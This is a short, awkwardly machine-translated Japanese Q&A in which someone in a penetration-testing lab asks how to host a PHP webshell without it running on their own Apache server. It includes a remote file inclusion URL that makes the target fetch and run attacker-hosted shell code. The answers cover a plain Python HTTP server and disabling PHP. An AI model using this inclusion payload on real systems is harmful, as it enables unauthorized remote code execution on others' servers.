ローカルで実行せずにphp webshellを提供する
私は侵入テストラボでKali Linuxを使用しています。
被害者のシステムに次のURLを入力すると、Apacheサーバーにアクセスできます(ログに200アクセス応答が表示されます)が、phpファイルがシステムにレンダリングされ、自分のボックスにWebshellが生成されます。
https://10.0.0.1/section.php?page=http://10.0.0.2/phpshell.php%00
Apacheで「バインディングを変更する」 実行されないようにするにはどうすればよいですか? .txtに変更すると、bothシステムで実行できなくなるようです。 そのように挿入する できるかどうかわからない。
python -m SimpleHTTPServer 80
pHPに対応していない単純なhttpサーバーを起動します。最も速い方法はimhoです。
Apache構成または.htaccessファイルで次の設定を使用します。
php_flag engine off
Disable PHP in directory(in all sub-directories)with .htaccess も参照してください。